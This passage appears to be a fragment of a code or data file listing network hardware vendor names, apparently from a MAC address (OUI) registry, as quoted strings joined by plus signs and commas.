"Hella India Automotive Pvt Ltd", + "Inventec Appliances Corp.", + "EFR Europäische Funk-Rundsteuerung GmbH", + "DANCONTROL Engineering", + "Nations Technologies Inc.", + "Dr. Ing. h.c. F. Porsche AG", + "AVI Systems GmbH", + "Dingxin Information Technology Co.,Ltd", + "Shenzhen Libtor Technology Co.,Ltd", + "PPC Broadband Inc.", + "JL Audio", + "Pepwave Limited", + "Hutec co.,ltd", + "Kygo Life A", + "JingLue Semiconductor(SH) Ltd.", + "Impact Technologies", + "Water-i.d. GmbH", + "Dongguan Haoyuan Electronics Co.,Ltd", + "Neatframe AS", + "Chun-il Co.,Ltd.", + "RAD Data Communications, Ltd.", + "Hella Gutmann Solutions GmbH", + "EFFECT Photonics B.V.", + "Sichuan tianyi kanghe communications co., LTD", + "WiZ Connected Lighting Company Limited", + "Newag SA", + "Hytec Inter Co., Ltd.", + "eWBM Co., Ltd.", + "DrayTek Corp.", + "Teracom Telematica S.a", + "New Pos Technology Limited", + "Oceanblue Cloud Technology Limited", + "Just Add Power", + "Beijing Xiaoyuer Network Technology Co., Ltd", + "APS Networks GmbH", + "Pacific Satellite International Ltd.", + "Vodafone Automotive S.p.A.", + "Megafone Limited", + "Shanghai Maigantech Co.,Ltd", + "di-soric GmbH & Co. KG", + "ER-Telecom", + "IC Holdings LLC", + "Industrial Cyber Sensing Inc.", + "Pivotal Commware, Inc.", + "Echowell", + "Douglas Lighting Controls", + "KUPSON spol. s r.o.", + "YSTen Technology Co.,Ltd", + "Shenzhen Feitengyun Technology Co.,LTD", + "Yoisys", + "First Property (Beijing) Co., Ltd Modern MOMA Branch", + "ShenZhen Sweet Rain Electronics Co.,Ltd.", + "Polytec GmbH", + "Cynosure Technologies Co.,Ltd", + "oshkosh Corporation", + "Azalea Networks inc", + "Es-tech International", + "Innovation Wireless", + "Flextronics Manufacturing(Zhuhai)Co.,Ltd.", + "Hivesystem", + "LEAX Arkivator Telecom", + "Hirose Electronic System", + "Yellowtec GmbH", + "Piper Networks, Inc.", + "Thalmic Labs", + "Coral Network Corporation", + "Shenzhen Holatek Co.,Ltd", + "LTI Motion (Shanghai) Co., Ltd.", + "Shenzhen Yipinfang Internet Technology Co.,Ltd", + "Hunan Greatwall Galaxy Science and Technology Co.,Ltd.", + "Xi'an Fengyu Information Technology Co., Ltd.", + "LAM Technologies", + "SB SYSTEMS Co.,Ltd", + "Tianjin Geneuo Technology Co.,Ltd", + "Sncf Mobilités", + "BSH Hausgeraete GmbH", + "Areson Technology Corp.", + "Guangdong Huiwei High-tech Co., Ltd.", + "CKS Corporation", + "Morse Micro", + "Dadoutek Company Limited", + "TE Connectivity Sensor Solutions", + "Medicaroid Corporation", + "Shanghai AdaptComm Technology Co., Ltd.", + "Wesine (Wuhan) Technology Co., Ltd.", + "Samsung Electronics Co., Ltd. ARTIK", + "Agilecom Photonics Solutions Guangdong Limited", + "China Mobile Chongqing branch", + "CareView Communications", + "Magic Leap, Inc.", + "Keysight Technologies, Inc.", + "PT Prakarsa Visi Valutama", + "Chang Yow Technologies International Co.,Ltd.", + "KonnectONE, LLC", + "Mios, Ltd.", + "Audeze LLC", + "Syswave Co., Ltd", + "Shenzhen Taikaida Technology Co., Ltd", + "EMTAKE Inc", + "NEXCONTROL Co.,Ltd", + "Phicomm (Sichuan) Co.,Ltd.", + "Yaskawa Electric Corporation", + "Baumer Holding", + "Shanghai Focus Vision Security Technology Co.,Ltd", + "Siemens Home & Office Comm. Devices", + "Kinexon GmbH", + "Mercku", + "Muco Industrie BV", + "SnapRoute", + "Beijing Ctimes Digital Technology Co., Ltd.", + "The 41St Institute Of Cetc", + "Beijing MEGA preponderance Science & Technology Co. Ltd", + "Nanjing Aozheng Information Technology Co.Ltd", + "ETHERNET Powerlink Standarization Group (EPSG)", + "DigiBoard", + "PNI sensor corporation", + "Qingdao GoerTek Technology Co., Ltd.", + "RIM Testing Services", + "MEIZU Technology Co.,Ltd.", + "JUWEL Aquarium AG & Co. KG", + "Schindler - PORT Technology", + "Comsys Communication Ltd.", + "Industrial Software Co", + "Wirepas Oy", + "HDR10+ Technologies, LLC", + "BEFEGA GmbH", + "Qing Dao Haier Telecom Co.,Ltd.", + "Bowei Technology Company Limited", + "Barun Electronics", + "Specialix (Asia) Pte, Ltd", + "Guangzhou Blue Cheetah Intelligent Technology Co., Ltd.", + "Jumptronic GmbH", + "Shenzhen Maxtang Computer Co.,Ltd", + "Bh Technologies", + "Planex Communications Inc.", + "TRnP KOREA Co Ltd", + "Marking System Technology Co., Ltd.", + "ABB Inc/Totalflow", + "Eccel Corporation Sas", + "Edison Labs Inc.", + "HangZhou Gubei Electronics Technology Co.,Ltd", + "SIA TeleSet", + "Twpi", + "Tecon MT, LLC", + "Shenzhen NUOLIJIA Digital Technology Co.,Ltd", + "innomdlelab", + "Calista", + "ShenZhen Chenyee Technology Co., Ltd.", + "Industria Fueguina de Relojería Electrónica s.a.", + "Ford", + "Test-Um Inc.", + "ChongQing GuanFang Technology Co.,LTD", + "Equiinet Ltd.", + "Beijing Netpower Technologies Inc.", + "Essel-T Co., Ltd", + "Sterlite Optical Technologies Limited", + "Rayson Technology Co., Ltd.", + "Ouster", + "Xi'an Link-Science Technology Co.,Ltd", + "Shenzhen Vtsonic Co.,ltd", + "Qingdao Haier Intelligent Home Appliance Technology Co.,Ltd", + "Seagate Technology", + "Enterasys", + "Datex Division Of", + "Muuselabs NV/SA", + "Alibaba Cloud Computing Ltd.", + "Rcntec", + "Nanjing PANENG Technology Development Co.,Ltd", + "Anda Technologies SAC", + "epro GmbH", + "PernixData", + "AddOn Computer", + "SenRa Tech Pvt. Ltd", + "SNS Solutions, Inc.", + "AXIe Consortium, Inc.", + "Hipad Intelligent Technology Co., Ltd.", + "Hangzhou Puwell OE Tech Ltd.", + "Lucid Vision Labs", + "Emstone", + "Essys", + "Jinwoo Industrial system", + "TRENDnet, Inc.", + "Ricoh Company, Ltd.", + "Spectronix Corporation", + "Caldero Limited", + "Tintri", + "Daikin Air-conditioning (Shanghai) Co., Ltd.", + "Vsoontech Electronics Co., Limited", + "RoomReady/Zdi, Inc.", + "Fraunhofer FIT", + "​ASUNG TECHNO CO.,Ltd", + "PHAZR Inc.", + "JTI Co.,Ltd.", + "Ring Solutions", + "Tokyo Boeki Medisys Inc.", + "CoSyst Control Systems GmbH", + "Indyme Solutions, LLC", + "Wuhan QianXiao Elecronic Technology CO.,LTD", + "Tf Payment Service Co., Ltd", + "Fai Wah International (Hong Kong) Limited", + "Shenzhen Gwelltimes Technology Co.,Ltd", + "AMIT, Inc.", + "Everspin Technologies, Inc.", + "Teltronic AG", + "Layer3TV, Inc", + "Solidwintech", + "Dmet Products Corp.", + "Smart Innovation LLC", + "Zhejiang Nurotron Biotechnology Co.", + "Beijing Tengling Technology CO.Ltd", + "Biamp Systems", + "Proximus", + "Varex Imaging Deutschland AG", + "IEEE 802.1 Chair", + "Arrikto Inc.", + "Jiangxi Gosun Guard Security Co.,Ltd", + "Keenetic Limited", + "Aetek Inc.", + "JJ Corp", + "Bit4id Srl", + "Bamboo Systems Group", + "Cepton Technologies", + "Yu Fly Mikly Way Science and Technology Co., Ltd.", + "Vision Valley FZ LLC", + "Shanghai X-Cheng telecom LTD", + "Hybridserver Tec GmbH", + "Becton, Dickinson and Company", + "H. Schomäcker GmbH", + "Syslane, Co., Ltd.", + "GHIA Technology (Shenzhen) LTD", + "Tamio, Inc", + "Aetheris Technology (Shanghai) Co., Ltd.", + "Shanghai Flyco Electrical Appliance Co.,Ltd", + "Targa Systems Div L-3 Communications", + "Youngzone Culture (Shanghai) Corp", + "PCS Systemtechnik GmbH", + "WiFiSONG", + "Piller Group GmbH", + "Shenzhen Fanhai Sanjiang Electronics Co., Ltd.", + "CviLux Corporation", + "Hypertherm Inc", + "Kolff Computer Supplies b.v.", + "Wistron Corporation", + "Tzukuri Pty Ltd", + "Lt Security Inc", + "Xiotech Corporation", + "Kirale Technologies SL", + "Kinpo Electronics, Inc.", + "Niles Audio Corporation", + "Xpeed, Inc.", + "Shenzhen Fise Technology Holding Co.,Ltd.", + "MSF-Vathauer Antriebstechnik GmbH & Co KG", + "Dilax Intelcom GmbH", + "Uniwell Corporation", + "Co-Comm Servicios Telecomunicaciones S.L.", + "Act.co.ltd", + "Yokogawa Digital Computer Corporation", + "Helmut Mauell GmbH Werk Weida", + "Futura Mobility", + "Ridgeline Instruments", + "Crrc Dalian R&D Co.,Ltd.", + "Cal-Comp Electronics & Communications Company Ltd.", + "General Solutions, LTD.", + "Rheem Australia Pty Ltd", + "Rubezh", + "shenzhen lensun Communication Technology LTD", + "Pt Han Sung Electoronics Indonesia", + "Eddy Smart Home Solutions Inc.", + "Thundercomm Technology Co., Ltd", + "Cloudistics", + "CDR Sp. z o.o. Sp. k.", + "Cree, Inc.", + "N-Radio Technologies Co., Ltd.", + "Shenzhen Feasycom Technology Co., Ltd.", + "Boeing Defence Australia", + "OCT Technology Co., Ltd.", + "Cmitech", + "Micromedia AG", + "ID Tech", + "Vertex Standard LMR, Inc.", + "Delta Electronics", + "IPnect co. ltd.", + "Hangzhou Kuaiyue Technologies, Ltd.", + "eQ-3 Entwicklung GmbH", + "Nagravision SA", + "Nureva, Inc.", + "Sitael S.p.A.", + "Jabil Circuit Hungary Ltd.", + "Xstreamis Plc", + "Zhuhai Raysharp Technology Co.,Ltd", + "Ultra Electronics Command & Control Systems", + "Ralinwi Nanjing Electronic Technology Co., Ltd.", + "Htel", + "Guangzhou Shiyuan Electronics Co., Ltd.", + "Ecoliv Technology ( Shenzhen ) Ltd.", + "Sivantos GmbH", + "Networked Energy Services", + "Plexus (Xiamen) Co.,ltd.", + "Maxphotonics Co.,Ltd", + "Quanta Microsystems,Inc.", + "ShangHai Broadband Technologies CO.LTD", + "Shanghai Sunmon Communication Technogy Co.,Ltd", + "Wallys Communications Teachnologies Co.,Ltd.", + "Delta Networks, Inc.", + "Cognitive Systems Corp.", + "Guangdong Nufront CSC Co., Ltd", + "Tecc Co.,Ltd.", + "Phonak AG", + "Spectrix Corporation", + "x-fabric GmbH", + "Nuki Home Solutions GmbH", + "Shenzhen SC Technologies Co.,LTD", + "Radware", + "Unicoi Systems", + "Siemens Building", + "Embedtronics Oy", + "Tranzas, Inc.", + "Wata Electronics Co.,Ltd.", + "Smart Energy Instruments Inc.", + "Westell Technologies Inc.", + "ZNYX Networks, Inc.", + "Bbk Educational Electronics Corp.,Ltd.", + "Open Road Solutions , Inc.", + "Quantum Corporation", + "Alps Alpine", + "Solarflare Communications Inc.", + "Beijing Sogou Technology Development Co., Ltd.", + "Shenzhen JMicron Intelligent Technology Developmen", + "Hangzhou Telin Technologies Co., Limited", + "Universal De Desarrollos Electrónicos, Sa", + "COBI GmbH", + "Gionee Communication Equipment Co.,Ltd.", + "Shanghai HITE-BELDEN Network Technology Co., Ltd.", + "Shenzhen Mtc Co Ltd", + "MarqMetrix", + "Sensus Metering Systems", + "AOD Co.,Ltd.", + "Capisco Limited", + "Beijing Co-Cloud Technology Ltd.", + "Navdy, Inc.", + "Opsens Solution Inc.", + "SYSTRONIK Elektronik u. Systemtechnik GmbH", + "WPS Parking Systems", + "AgLogica Holdings, Inc", + "9Solutions Oy", + "Shenzhen Bilian electronic CO.,LTD", + "Treeview Co.,Ltd.", + "Shenzhen Safe vision Technology Co.,LTD", + "Hyunjin.com", + "INCAA Computers", + "Siemens AG Energy Management Division", + "Gessler GmbH", + "Elentec", + "GN Netcom A/S", + "Linear DMS Solutions Sdn. Bhd.", + "HanbitEDS Co., Ltd.", + "Parker Hannifin Manufacturing Germany GmbH & Co. KG", + "IMK Networks Co.,Ltd", + "Leaf Corporation.", + "WOM Engineering", + "LED Roadway Lighting", + "Fujitsu Isotec Limited", + "iSmart Alarm, Inc.", + "DDoS-Guard LTD", + "F-Secure Corporation", + "Xiamen Four-Faith Communication Technology Co.,Ltd", + "Kaicom co., Ltd.", + "Advanced-Connectek Inc.", + "Vitec System Engineering Inc.", + "Yaptv", + "K.A. Schmersal GmbH & Co. KG", + "Elastifile", + "Nusoft Corporation", + "Shenzhen Ktc Technology Group", + "FANUC ROBOTICS NORTH AMERICA, Inc.", + "Sepro Robotique", + "EDMI Europe Ltd", + "12Sided Technology, LLC", + "QNAP Systems, Inc.", + "Valens Semiconductor Ltd.", + "Latticework, Inc", + "Japan Radio Co., Ltd.", + "Genetec Inc.", + "Elsys Equipamentos Eletrônicos Ltda", + "Communication Machinery Corporation", + "Beijing Jingdong Century Trading Co., LTD.", + "Ivium Technologies B.V.", + "ARG Telecom", + "Asiarock Technology Limited", + "Alpha Micro", + "Sprocomm Technologies CO.,Ltd", + "Stanley Security Solutions", + "Orbbec 3D Technology International", + "Doppler Labs", + "TCL Technoly Electronics (Huizhou) Co., Ltd.", + "ONvocal Inc", + "Embedded Intellect Pty Ltd", + "Lester Electrical", + "Gotech International Technology Limited", + "Baxter International Inc", + "SmartThings, Inc.", + "EMAC, Inc.", + "Applied Optoelectronics, Inc Taiwan Branch", + "Ignition Design Labs", + "Riso Kagaku Corporation", + "Beken Corporation", + "Assa Abloy Côte Picarde", + "Panda Wireless, Inc.", + "Shenzhen lnovance Technology Co.,Ltd.", + "bioMérieux Italia S.p.A.", + "Giantec Semiconductor Inc", + "Csr Zhuzhou Institute Co.,Ltd.", + "InTalTech Ltd.", + "Cochlear Limited", + "Comper Technology Investment Limited", + "STMicroelectronics SRL", + "Insight Energy Ventures LLC", + "Intellisis", + "Saffron Solutions Inc", + "MOCACARE Corporation", + "Jdm Mobile Internet Solution Co., Ltd.", + "Source Chain", + "Beijing Infosec Technologies Co., LTD.", + "Leie IOT technology Co., Ltd", + "Oasis Media Systems LLC", + "Airsonics", + "Charles River Laboratories", + "Roqos, Inc.", + "CKD Corporation", + "Homerider Systems", + "Ovh", + "Finis Inc", + "Jolata, Inc.", + "Wearsafe Labs Inc", + "Wuxi Hongda Science and Technology Co.,LTD", + "Inficomm Co., Ltd", + "BQT Solutions (Australia)Pty Ltd", + "Lenovo (Beijing) Co., Ltd.", + "DSPWorks", + "YUKAI Engineering", + "Lupine Lighting Systems GmbH", + "Music Life LTD", + "Zhuhai Pantum Electronics Co., Ltd.", + "Ducere Technologies Pvt. Ltd.", + "Objetivos y Servicio de Valor Añadido", + "Perples", + "Gigaset Digital Technology (Shenzhen) Co., Ltd.", + "Goyoo Networks Inc.", + "UTT Technologies Co., Ltd.", + "Invensys Controls UK Limited", + "Atelier Vision Corporation", + "Shanghai Artimen Technology Co., Ltd.", + "Shenzhen Ferex Electrical Co.,Ltd", + "ABB Global Industries and Services Private Limited", + "Telink Semiconductor (Taipei) Co. Ltd.", + "Codex Digital Limited", + "Media Global Links Co., Ltd.", + "Fujian Beifeng Telecom Technology Co., Ltd.", + "Shanghai Viroyal Electronic Technology Company Limited", + "ShenZhen Continental Wireless Technology Co., Ltd.", + "Suzhou Torchstar Intelligent Technology Co.,Ltd", + "Cohere Technologies", + "Busch-Jaeger Elektro GmbH", + "so-logic", + "ShenZhen Topstar Technology Company", + "Ascensia Diabetes Care", + "Qolsys Inc.", + "Hi-P Electronics Pte Ltd", + "Echosens", + "Tokyo Cosmos Electric Co.,Ltd.", + "Spark srl", + "Cheerstar Technology Co., Ltd", + "Motus Global Inc.", + "Wearhaus Inc.", + "Milkyway Group Ltd", + "Absolute Acoustics", + "innodisk Corporation", + "Qingdao Eastsoft Communication Technology Co.,LTD", + "Shanghai Mobiletek Communication Ltd.", + "Glory Star Technics (ShenZhen) Limited", + "W & D Technology Corporation", + "Davit System Technology Co., Ltd.", + "Lanbowan Technology Ltd.", + "Shenzhen Fortune Ship Technology Co., Ltd.", + "Cheering Connection Co. Ltd.", + "Minxon Hotel Technology INC.", + "Tecsen", + "Fortify Technologies, LLC", + "Shanghai Net Miles Fiber Optics Technology Co., LTD.", + "Sps, Inc.", + "ULTIMEDIA Co Ltd,", + "Giroptic", + "杭州德澜科技有限公司(HangZhou Delan Technology Co.,Ltd)", + "Letv Mobile and Intelligent Information Technology (Beijing) Corporation Ltd.", + "Xinhua Control Engineering Co.,Ltd", + "Geberit International AG", + "IDEO Security Co., Ltd.", + "Hangzhou Tuners Electronics Co., Ltd", + "Osterhout Design Group", + "Virtual Electric Inc", + "Net Rules Tecnologia Eireli", + "Leica Camera AG", + "Softiron Inc.", + "General Electric Global Research", + "Shenzhen Ikinloop Technology Co.,Ltd.", + "Evervictory Electronic Co.Ltd", + "HangZhou JuRu Technology CO.,LTD", + "Hangzhou Konke Technology Co.,Ltd.", + "ASSMANN Electronic GmbH", + "ServerU Inc", + "RainUs Co.,Ltd", + "Nemoa Electronics (Hk) Co. Ltd", + "Hangzhou Treebear Networking Co., Ltd.", + "Rosen Aviation", + "Rosslare Enterprises Limited", + "Hitachi Maxell, Ltd., Optronics Division", + "Dexatek Technology LTD.", + "Beijing Nari Smartchip Microelectronics Company Limited", + "Buheung System", + "C-MAX Asia Limited", + "Tallac Networks", + "DriveScale, Inc.", + "Cheerzing Communication(Xiamen)Technology Co.,Ltd", + "KMB systems, s.r.o.", + "Shenzhen Yoostar Technology Co., Ltd", + "Shenzhen UTEPO Tech Co., Ltd.", + "Guangzhou Bosma Technology Co.,Ltd", + "Rtnet", + "SC Professional Trading Co., Ltd.", + "SKS Welding Systems GmbH", + "Panasonic Taiwan Co.,Ltd.", + "Guangzhou Younghead Electronic Technology Co.,Ltd", + "Shenzhen Guzidi Technology Co.,Ltd", + "InCoax Networks Europe AB", + "ruwido austria gmbh", + "AIRTAME ApS", + "Yangzhou ChangLian Network Technology Co,ltd.", + "Powerlinq Co., LTD", + "IC Intracom", + "China Essence Technology (Zhumadian) Co., Ltd.", + "Nanomegas", + "Wuhan FiberHome Digital Technology Co.,Ltd.", + "Flashbay Limited", + "Beijing Autelan Technology Co.,Ltd", + "Lipi Data Systems Ltd.", + "C.g.v. S.a.s.", + "Newbridge Technologies Int. Ltd.", + "Tatsuno Corporation", + "DTI Group Ltd", + "UTran Technology", + "Eclipse WiFi", + "Hitachi High Technologies America, Inc.", + "Helium Systems, Inc", + "Coagent International Enterprise Limited", + "Telegrafia a.s.", + "Risk Technology Ltd", + "Phistek INC.", + "Prophet Electronic Technology Corp.,Ltd", + "Gugaoo HK Limited", + "Greyware Automation Products, Inc", + "ZPT Vigantice", + "Research Centre Module", + "AXPRO Technology Inc.", + "Volacomm Co., Ltd", + "Wytek", + "Erhardt+Leimer GmbH", + "Audioengine, Ltd.", + "Aristocrat Technologies Australia Pty. Ltd.", + "ARVIDA Intelligent Electronics Technology Co.,Ltd.", + "Shenzhen Zowee Technology Co., Ltd", + "Dejai", + "Automatic Bar Controls Inc.", + "Bointec Taiwan Corporation Limited", + "Lyve Minds, Inc", + "Sertel Electronics UK Ltd", + "Grey Innovation", + "Coval", + "ZAO NPO Introtest", + "Silver Palm Technologies LLC", + "National Resource Management, Inc.", + "Open Standard Digital-IF Interface for SATCOM Systems", + "ACK Networks,Inc.", + "Kapelse", + "LTi REEnergy GmbH", + "Digiquest Electronics LTD", + "Shanghai Winaas Co. Equipment Co. Ltd.", + "Ming Hong Technology (Shen Zhen) Limited", + "Vallox Oy", + "SkyDisk, Inc.", + "Zhejiang Hite Renewable Energy Co.,LTD", + "Sinwatec", + "Hangzhou OYE Technology Co. Ltd", + "Shenzhen Winyao Electronic Limited", + "Lime Instruments", + "Tensorcom", + "Beijing Sinoix Communication Co., LTD", + "Shenzhen Guo Wei Electronic Co,. Ltd.", + "Vlatacom", + "Changzhou Uchip Electronics Co., LTD.", + "PulseOn Oy", + "Woxu Wireless Co., Ltd", + "ANOV France", + "Aztech Associates Inc.", + "Dewar Electronics Pty Ltd", + "NGN Easy Satfinder (Tianjin) Electronic Co., Ltd", + "Gionee Communication Equipment Co,Ltd.ShenZhen", + "Newrun", + "r2p Asia-Pacific Pty Ltd", + "Advantage Pharmacy Services, LLC", + "ShangHai WangYong Software Co., Ltd.", + "Unikey Technologies", + "KoamTac", + "Shenzhen UniStrong Science & Technology Co., Ltd", + "Gridstore Inc.", + "Sunflex Europe GmbH", + "Espec Corp.", + "Aventura Technologies, Inc.", + "Opticom Communication, LLC", + "SoundHawk Corp", + "OpenProducts 237 AB", + "Fon Technology", + "Aptos Technology", + "General Engine Management Systems Ltd.", + "Shanghai Rui Rui Communication Technology Co.Ltd.", + "Kirisun Communications Co., Ltd.", + "iSonea Limited", + "AB Sciex", + "SunDroid Global limited.", + "LaVision GmbH", + "Shenzhen Linsn Technology Development Co.,Ltd", + "Nautronix Limited", + "Exablaze", + "Hitachi Reftechno, Inc.", + "Alfa Instrumentos Eletronicos Ltda.", + "Fijowave Limited", + "Securetech Inc", + "Cummings Engineering", + "Adapteva, Inc.", + "Winduskorea co., Ltd", + "Ingenieurbuero Stahlkopf", + "Swisscom Energy Solutions AG", + "Riava Networks, Inc.", + "Shen Zhen RND Electronic Co.,LTD", + "WISEWARE, Lda", + "Aqavi.com", + "IBA Dosimetry GmbH", + "IO-Power Technology Co., Ltd.", + "Avistel", + "Pantech Co., Ltd.", + "littleBits Electronics, Inc.", + "Westcontrol AS", + "Smg Enterprise, Llc", + "The Boeing Company", + "A&R Tech", + "Viscount Systems Inc.", + "Histar Digital Electronics Co., Ltd.", + "Himax Technologies, Inc", + "Matsufu Electronics distribution Company", + "Etek Technology (Shenzhen) Co.,Ltd", + "Changshu Gaoshida Optoelectronic Technology Co. Ltd.", + "Cardiopulmonary Corp", + "Techno-Innov", + "CASwell INC.", + "Adafruit", + "Aliph dba Jawbone", + "Host Mobility AB", + "Beijing Morncloud Information And Technology Co. Ltd.", + "Socus networks", + "Salix Technology CO., Ltd.", + "SRC Computers, LLC", + "Shenzhen G.Credit Communication Technology Co., Ltd", + "Bryton Inc.", + "SK hynix", + "OOO Petr Telegin", + "ShenZhen Hitom Communication Technology Co..LTD", + "Cedint-Upm", + "PAV GmbH", + "HOERBIGER Elektronik GmbH", + "Edata Elektronik San. ve Tic. A.Ş.", + "Zentri Pty Ltd", + "Datatech Sistemas Digitales Avanzados SL", + "Power Automation pte Ltd", + "Yasuda Joho Co.,ltd.", + "K2E Tekpoint", + "Airios", + "IPS Technology Limited", + "Hangzhou Dunchong Technology Co.Ltd", + "U&U Engineering Inc.", + "Physio-Control, Inc", + "Aclima, Inc.", + "Hangzhou Sunyard Technology Co., Ltd.", + "Watchnet DVR Inc", + "Kishu Giken Kogyou Company Ltd,.", + "Alba Fiber Systems Inc.", + "Videoswitch", + "ChongQing QingJia Electronics CO.,LTD", + "Cavanagh Group International", + "Vispiron Rotec GmbH", + "Alula", + "Kaeser Kompressoren Ag", + "Affinegy", + "Liaoning Wontel Science and Technology Development Co.,Ltd.", + "Livescribe, Inc.", + "JVL Industri Elektronik", + "Ashley Butterworth", + "IT-IS International", + "Kurth Electronic GmbH", + "Elecsys International Corporation", + "Vivavis Ag", + "Cincoze Co., Ltd.", + "Ventilation Control", + "Realplay Digital Technology(Shenzhen) Co.,Ltd", + "RuggedCom Inc.", + "SUYIN Corporation", + "APS systems/electronic AG", + "Guangdong Super Telecom Co.,Ltd.", + "Wistron (ChongQing)", + "ROBOTIS, Co, Ltd", + "Suntec Software(Shanghai) Co., Ltd.", + "Qualisys AB", + "Protectron", + "Chengdu Usee Digital Technology Co., Ltd", + "Shinsei Electronics Co Ltd", + "Digital RF Corea, Inc", + "SAET I.S. S.r.l.", + "JANUS, spol. s r.o.", + "Osorno Enterprises Inc.", + "Epec Oy", + "Whistle Labs, Inc.", + "Shanghai LISTEN TECH.LTD", + "Zera GmbH", + "Brightsource Industries Israel LTD", + "AREC Inc.", + "ISC applied systems corp", + "EltexAlatau", + "Leopold Kostal GmbH &Co. KG", + "Sanmina-Sci System De Mexico S.a. De C.v.", + "NanJing Chaoran Science & Technology Co.,Ltd.", + "Shenzhen Friendcom Technology Development Co., Ltd", + "InView Technology Corporation", + "ControlThings Oy Ab", + "MilDef AB", + "CoreTrust Inc.", + "Han Kyung I Net Co.,Ltd.", + "Laon Technology Co., Ltd.", + "Nimax Telecom Co.,Ltd.", + "Raycore Taiwan Co., LTD.", + "GooWi Technology Co.,Limited", + "Microstep-MIS spol. s r.o.", + "Shenzhen WeWins wireless Co.,Ltd", + "Edison Global Circuits Llc", + "RTW GmbH & Co. KG", + "Shenzhen Yichen Technology Development Co.,LTD", + "AIM GmbH", + "Fort-Telecom ltd.", + "BitBox Ltd", + "Hanyang Digitech Co.Ltd", + "SnD Tech Co., Ltd.", + "Emcraft Systems LLC", + "WondaLink Inc.", + "Grandex International Corporation", + "CNSLink Co., Ltd.", + "DDL Co,.ltd.", + "Corsair Memory, Inc.", + "MtM Technology Corporation", + "Tongfang Shenzhen Cloudcomputing Technology Co.,Ltd", + "Signal Path International / Peachtree Audio", + "Swann communications Pty Ltd", + "Cameo Communications, Inc.", + "EuroCB (Phils), Inc.", + "Time-O-Matic, Inc.", + "Shenzhen Kaiboer Technology Co., Ltd.", + "Pace Americas", + "Jetmobile Pte Ltd", + "Beijing MDC Telecom", + "Teseq AG", + "Shanghai Longjing Technology Co.", + "Shenzhen Runhuicheng Technology Co., Ltd", + "V. Stonkaus firma Kodinis Raktas", + "Orbotix, Inc.", + "Telesquare", + "Integrated System Technologies Ltd", + "home2net GmbH", + "Shenzhen Lianrui Electronics Co.,Ltd", + "Rainforest Automation, Inc.", + "Chongqing Ehs Science and Technology Development Co.,Ltd.", + "Lumigon A/S", + "DLI Taiwan Branch office", + "CSUN System Technology Co.,LTD", + "SHINANO E and E Co.Ltd.", + "Objetivos y Servicios de Valor A", + "MC Technologies GmbH", + "FreeTek International Co., Ltd.", + "SK Mtek Limited", + "TELCO systems, s.r.o.", + "Webtech Wireless", + "DataGravity", + "Shenzhen Ostar Display Electronic Co.,Ltd", + "Sensium Healthcare Limited", + "Guangzhou Robustel Technologies Co., Limited", + "Philips Electronics Nederland BV", + "Incognito Software Systems Inc.", + "Logosol, Inc.", + "Shanghai Uniscope Technologies Co.,Ltd", + "Pixon Imaging", + "Apiste Corporation", + "Huanshun Network Science and Technology Co., Ltd.", + "NIC.br- Nucleo de Informacao e Coordenacao do Ponto BR", + "Java Information", + "Giga Tms Inc", + "Eidolon Communications Technology Co. Ltd.", + "Zurich Instruments AG", + "Shanghai Super Electronics Technology Co.,LTD", + "SilverPlus, Inc", + "EDS Elektronik Destek San.Tic.Ltd.Sti", + "Digit Mobile Inc", + "Elsys Equipamentos Eletronicos Ltda", + "STI Ltd", + "QSR Automations, Inc.", + "Glintt Tes S.a.", + "Shenzhen Baojia Battery Technology Co., Ltd.", + "GuangZhou Hedy Digital Technology Co., Ltd", + "Krypton Polska", + "Nanjing Fujitsu Computer Products Co.,Ltd.", + "IP500 Alliance e.V.", + "Totus Solutions, Inc.", + "BNS Solutions", + "Siemens AG I IA PP PRM", + "Mplus technology", + "Hangzhou Bigbright Integrated communications system Co.,Ltd", + "GlobalBeiMing technology (Beijing)Co. Ltd", + "Siano Mobile Silicon Ltd.", + "SAE IT-systems GmbH & Co. KG", + "Nevatec", + "Dong Oh Precision Co., Ltd.", + "LARK Technologies, Inc", + "RUAG Schweiz AG", + "ILJIN ELECTRIC Co., Ltd.", + "Kinion Technology Company Limited", + "Voltronic Power Technology(Shenzhen) Corp.", + "Marketaxess Corporation", + "Beissbarth", + "Realand Bio Co., Ltd.", + "Macrotech (Usa) Inc.", + "Creative&Link Technology Limited", + "Fastback Networks", + "Zero1.tv GmbH", + "Rami", + "Xilinx, Inc", + "SINTRONES Technology Corp.", + "Syncmold Enterprise Corp", + "Noblex Sa", + "Acro Associates, Inc.", + "Gridco Systems, Inc.", + "Precepscion Pty. Ltd.", + "ITG, Inc.", + "AgJunction", + "BMT Medical Technology s.r.o.", + "electric imp, incorporated", + "Bach-Simpson", + "Meggitt Training Systems, Inc.", + "Dog Hunter LLC", + "Sensometrix SA", + "Futaba-Kikaku", + "Tianjin Yaan Technology Co., Ltd.", + "Tamaggo", + "Newland Design + Assoc. Inc.", + "ConversDigital Co., Ltd.", + "Vishal Telecommunications Pvt Ltd", + "Shenzhen Y&D Electronics Co.,LTD.", + "Coster T.E. S.P.A.", + "Jiangsu Cynray IOT Co., Ltd.", + "Virtualtek. Co. Ltd", + "ASR Co,.Ltd.", + "WaterFurnace International, Inc.", + "Arrowhead Alarm Products Ltd", + "Myreka Technologies Sdn. Bhd.", + "Relay2, Inc.", + "Panasonic Appliances Company", + "Regenersis (Glenrothes) Ltd", + "Newport Corporation", + "Lufkin Industries", + "ITC Networks", + "Dongguan Yishang Electronic Technology Co., Limited", + "MKS Instruments Deutschland GmbH", + "Applied Research Associates, Inc", + "Along Communication Technology", + "Hunan HKT Electronic Technology Co., Ltd", + "EnerAccess inc", + "QA Cafe", + "Zhuhai Liming Industries Co., Ltd", + "Unicard Sa", + "Sonotronic Nagel GmbH", + "6harmonics Inc", + "Intelcan Technosystems Inc.", + "Logic Way GmbH", + "Netronics Technologies Inc.", + "Mitsunami Co., Ltd.", + "Geodesic Ltd.", + "Xorcom Ltd.", + "NCTech Ltd", + "Life Technology (China) Co., Ltd", + "MTData Developments Pty. Ltd.", + "SIMEX Sp. z o.o.", + "RO.VE.R. Laboratories S.p.A.", + "Exablox", + "Embrane", + "Zen Eye Co.,Ltd", + "Thomson Video Networks", + "Clt Int'l Ind. Corp.", + "Shenzhen CATIC Bit Communications Technology Co.,Ltd", + "Shihlin Electric & Engineering Corp.", + "Treetech Sistemas Digitais", + "ChargeStorm AB", + "Trade FIDES, a.s.", + "TITECH GmbH", + "Parking BOXX Inc.", + "Shanghai Dongzhou-Lawton Communication Technology Co. Ltd.", + "Amber Technology Ltd.", + "Wkk Technology Ltd.", + "Theobroma Systems GmbH", + "Kriwan 